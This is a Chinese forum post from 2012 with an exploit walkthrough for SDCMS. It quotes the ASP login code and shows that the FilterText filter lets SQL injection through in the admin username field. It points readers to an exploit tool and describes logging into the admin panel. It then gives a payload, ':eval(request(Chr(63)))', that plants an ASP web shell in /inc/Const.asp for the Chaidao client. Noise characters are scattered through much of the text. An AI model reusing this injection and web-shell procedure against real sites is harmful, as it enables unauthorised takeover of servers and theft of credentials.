作者:T00LS 鬼哥
3 }0 `, @; l" q6 J) ~2 G漏洞文件:后台目录/index.asp m# Y, y& o4 K, e, B4 @
, k6 G& l/ g" v( k9 B5 T( f
Sub Check
' p$ F' t& S$ m! A0 H: t% Y Dim username,password,code,getcode,Rs
4 g; K+ |) Z: U* S IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
5 y: ^( U! m- q3 W2 m1 d' w username=FilterText(Trim(Request.Form("username")),1)4 Y! X a+ r7 H( Q7 w2 N" t
password=FilterText(Trim(Request.Form("password")),1)
' M& Y+ L% Y! W code=Trim(Request.Form("yzm"))
. b p6 {! d7 l- m, A Z getcode=Session("SDCMSCode")
$ {3 q8 L; z. N% U l+ ]0 h+ X IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died* f' a. O$ N, a
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
{" G, _& h5 i" H1 V& f8 |* p9 S! X IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
, K) i0 `# E, z0 d0 }, r) C IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied/ W/ r1 T7 t9 f( X- m- l* P
IF username="" or password="" Then0 f+ {9 [# o* G& f5 O6 D; ~ h
Echo "用户名或密码不能为空"ied
5 b( [ D, m/ X( q Else
5 r9 o* G: p3 Z/ n& {! y) h( x Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
3 G6 A; u7 s' ]% y7 S7 u IF Rs.Eof Then7 U& J+ O( F8 L* @) v( W
AddLog username,GetIp,"登录失败",10 X# d. v: }# F
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
. E1 R+ L; w$ S. j Else
& W4 ~. J" ~! e* b8 y, L6 S Add_Cookies "sdcms_id",Rs(0)- f: O9 ]6 @' J# x- v9 B
Add_Cookies "sdcms_name",username
$ u' r% W( ~/ `5 @6 D Add_Cookies "sdcms_pwd",Rs(2)% G, F' @, y3 Q! H4 y3 `% h1 C K h
Add_Cookies "sdcms_admin",Rs(3)% F# M+ a& k7 k8 E4 X L* V
Add_Cookies "sdcms_alllever",Rs(4)
5 S' ?/ h$ _0 f% p Add_Cookies "sdcms_infolever",Rs(5): G. ^* A5 V- ^$ \
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&""): s; C8 x8 O T# ^% j5 V. K8 h$ J+ I
AddLog username,GetIp,"登录成功",19 U- g' f. G q4 n! _, W
'自动删除30天前的Log记录
/ y. e9 D; J' f' v+ L) w IF Sdcms_DataType Then
t3 }5 ^; E5 m8 Y Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
* I7 u% g% ?: A) X6 q5 ` Else
, M$ i* U5 F8 ]. R Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
% Y" z/ d w3 `& q& n: z End IF3 F" f. L5 Y5 ] O
Go("sdcms_index.asp")5 `8 S, H" |7 H0 v; z6 y
End IF
! Y' Q) s" m9 e( p! A6 t Rs.Close, H- [/ ]4 Q: Q) u* c0 S4 B
Set Rs=Nothing
& u |) m: V J# m End IF
3 E% C' D" h7 K S4 m% ?$ k! \End Sub
3 m* y2 A. G3 f# U- m9 `7 p% q1 r
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码( i9 T: d, A' e) l
, L; r9 p* M7 e0 }" E" [Function FilterText(ByVal t0,ByVal t1)
, F: O4 B( u0 n- f! R0 N& u IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
" p0 M5 N* x$ x# j6 {; Q4 N/ M. { t0=Trim(t0); R9 d" j6 Y# n6 d: s5 \" t
Select Case t1" t: f3 i' N; t
Case "1"4 P6 q* i8 B+ b! S9 | n
t0=Replace(t0,Chr(32),"")% P7 ]% ]/ K5 f# o o) g- n8 {
t0=Replace(t0,Chr(13),"")
) {; t6 e. f0 [ I t0=Replace(t0,Chr(10)&Chr(10),"")( k5 I/ ^% R. T3 l' N
t0=Replace(t0,Chr(10),"")2 F( N9 U ~4 |$ O8 `5 j* |) {! W* f7 B
Case "2"8 l7 t6 `+ C, T$ _8 ^
t0=Replace(t0,Chr(8),"")'回格
" m' x& l" |2 y+ ? t0=Replace(t0,Chr(9),"")'tab(水平制表符)
# } p# \( N5 Y- D t0=Replace(t0,Chr(10),"")'换行
& U6 r" Z5 A& P, j- [ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)8 ]+ s' U# E9 l
t0=Replace(t0,Chr(12),"")'换页# ^$ X. w* V8 a, `9 u
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
% D- e! }5 P& G t0=Replace(t0,Chr(22),"")
- |' B- Y: @4 m6 e2 u% y4 J! W t0=Replace(t0,Chr(32),"")'空格 SPACE! r- s0 q# p' [/ Z
t0=Replace(t0,Chr(33),"")'!5 _. q6 _8 M1 ^& r8 j/ C, L
t0=Replace(t0,Chr(34),"")'"
+ `% Q) i, o3 f$ d' w) m" ~ t0=Replace(t0,Chr(35),"")'#
8 T8 U1 S7 {& r2 E6 B1 m t0=Replace(t0,Chr(36),"")'$, u, Y Q) \ P1 o3 Y
t0=Replace(t0,Chr(37),"")'%
) r' S3 S/ k+ X t0=Replace(t0,Chr(38),"")'&0 p9 _: I; W9 }$ T2 E8 Q# m! }
t0=Replace(t0,Chr(39),"")''
! G- x; H+ Q$ Z/ X t0=Replace(t0,Chr(40),"")'() e6 B) L4 |7 R4 J
t0=Replace(t0,Chr(41),"")')
, h9 H) f, T0 p/ t3 v/ ? t0=Replace(t0,Chr(42),"")'*
( t7 }& u% E8 v6 A; w t0=Replace(t0,Chr(43),"")'+. ~" J" {7 r# P% G; b& |/ z
t0=Replace(t0,Chr(44),"")',9 n) G+ a3 v5 o; V1 c
t0=Replace(t0,Chr(45),"")'-
4 i# g+ t0 t/ p, E0 f t0=Replace(t0,Chr(46),"")'.9 y( `$ q: i/ J# W% x0 \
t0=Replace(t0,Chr(47),"")'/+ W. O& T3 D7 q9 f) u$ X2 ~
t0=Replace(t0,Chr(58),"")':
1 `! h- d3 b5 N t0=Replace(t0,Chr(59),"")';9 P- ~( x3 p1 Z+ W
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
U; s. k& h9 B t0=Replace(t0,Chr(63),"")'?7 B( ^0 D/ C+ B/ v( |6 ]8 Q
t0=Replace(t0,Chr(64),"")'@, Z/ g* \& A( Q/ I2 |, H4 N. ?
t0=Replace(t0,Chr(91),"")'\9 p- [ N. [5 p6 c, J" B
t0=Replace(t0,Chr(92),"")'\
" s: L `2 W, X7 `# w( @ t0=Replace(t0,Chr(93),"")']
9 c" Y6 ~; N8 E6 e9 e& j t0=Replace(t0,Chr(94),"")'^ \/ `( k; ?2 P( O( K, [6 W( ? V
t0=Replace(t0,Chr(95),"")'_- d G' W0 R$ M- T. ^
t0=Replace(t0,Chr(96),"")'`; d* h& r' \- }. l1 z7 [2 P
t0=Replace(t0,Chr(123),"")'{
' ]. n! B; y, ?/ M3 b" i/ d# O t0=Replace(t0,Chr(124),"")'|
+ M& f9 L1 e* ^6 a/ A; F* ` t0=Replace(t0,Chr(125),"")'}
, V1 I% u' t6 }$ q: Z( k t0=Replace(t0,Chr(126),"")'~
4 m7 P$ Y. j4 Q( I* F Case Else
0 h8 s& W1 J+ N1 v9 X& n t0=Replace(t0, "&", "&"). ]' @# p' G8 p& L3 X7 H
t0=Replace(t0, "'", "'")
; H+ _! }- V( J5 [9 X t0=Replace(t0, """", """) L3 F, E7 _& j/ G0 n. y( C/ P
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
# t# M: [2 D1 P$ @# o$ M7 V End Select
' M- F& l. f. [" E3 e' g9 S IF Instr(Lcase(t0),"expression")>0 Then) y# B2 `; Q1 S1 d& j& R, |
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
0 N- x9 ~, ^. S$ s8 f5 J/ y End If4 r1 m! h5 o8 e+ h o% G
FilterText=t0
( \: ?2 ?0 N" Y, aEnd Function
( j+ W+ k2 U) D! j: l# i6 ^8 e$ O; N3 H% L
看到没。直接参数是1 只过滤
: S+ l' Y' }* `# V t0=Replace(t0,Chr(32)," ")
$ M* @$ D& T7 g- O t0=Replace(t0,Chr(13),"")
! d& x* W; j* a/ e; d2 T6 ? t0=Replace(t0,Chr(10)&Chr(10),"
" a/ c4 E$ k- W F"), L+ I0 t# \6 J/ `7 T8 }0 V
t0=Replace(t0,Chr(10),"
) Y- ^9 V4 o9 h")) L2 T# k/ q. j( F9 @; x; @
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!$ _, q8 E- R8 ~% a L+ j
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
2 v; ~8 O- G# E: a3 o9 `
1 w2 ]3 U U3 B* h, U$ w测试:
* F! g, l: }, f0 ?2 y+ K! C* u. M4 W4 ~/ N9 A7 S. y( L0 `0 Z
; M Y2 Y/ w9 a5 X' {
现在输入工具上验证码,然后点OK
/ }6 J7 q7 j( Z& X# Y
' v/ O0 U7 _4 A8 G p
+ G2 O& t+ m! F7 O看到我们直接进入后台管理界面了,呵呵!. }8 o. i2 w% v; w+ O- P' b
6 K- t6 |) h+ U$ i3 Y t- H
* V0 u- m( c. P1 t7 T P+ |1 K, a: D9 v3 `
这样直接进入后台了。。。。
* {7 o3 f2 p' ?! Y _/ s
5 G2 o7 i! H7 @ ' M+ {5 x: B5 [
) _7 u( ]: Y& O% E3 l8 i# cSDCMS提权:, M& l# l! i3 B
. }* D o% U; m8 V" G" R
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
/ |( E) n) m* H4 e' J! S- O( ^: n0 Z* n" Q
6 k6 {, L7 u. z/ s1 e
! b1 o. h0 {- g' B; r7 @- W( IOK,现在用菜刀连接下!$ ]. F5 S& E8 E f8 m
0 N. H- U+ [* v, n9 c/ n1 p( [
; T8 S5 A: H* p$ A' r; m+ V+ D, \/ c
6 ]# i& h$ Q7 U. l
$ q& I* b! `4 D" O! J k0 b# Y |
发表于 2012-11-9 20:57:02
收藏
支持
反对